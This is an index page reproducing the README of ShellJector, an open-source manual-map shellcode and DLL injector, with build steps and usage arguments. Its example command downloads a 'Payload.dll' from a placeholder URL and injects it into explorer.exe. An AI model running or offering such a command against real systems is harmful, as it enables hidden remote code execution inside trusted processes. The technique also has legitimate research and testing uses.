An open API service indexing awesome lists of open source software.

https://github.com/wolf49406/shelljector

Manual map shellcode (aka byte array) injector
https://github.com/wolf49406/shelljector

injection injector shellcode shellcode-injection shellcode-injector

Last synced: 9 months ago
JSON representation

Manual map shellcode (aka byte array) injector

Awesome Lists containing this project

README

          

# ShellJector (v2.0)
Manual map shellcode (aka byte array) injector wich can download DLL from the internet by URL
Also take a look at [local](https://github.com/Wolf49406/ShellJectorLocal) version!

[![MSBuild](https://github.com/Wolf49406/ShellJector/actions/workflows/msbuild.yml/badge.svg?branch=main)](https://github.com/Wolf49406/ShellJector/actions/workflows/msbuild.yml)

## How to Build:
- Open `ShellJector.sln -> main.cpp`;
- Set `ProcName` and `DllURL`;
- Build;

## Usage:
- Go to \ShellJector\Build;
- OR just download the [Latest Release](https://github.com/Wolf49406/ShellJector/releases/latest);
- Set launch arguments (down below);
- Open Target Process;
- Open `ShellJector.exe`;

## Arguments:
You can set `ProcName` and `DllURL` with `-proc` and `-url` arguments
(ex: `ShellJector.exe -proc explorer.exe -url "https://example.com/Payload.dll"`)
Arguments are case **sensitive**!

## Stargazers over time
[![Stargazers over time](https://starchart.cc/Wolf49406/ShellJector.svg?variant=adaptive)](https://starchart.cc/Wolf49406/ShellJector)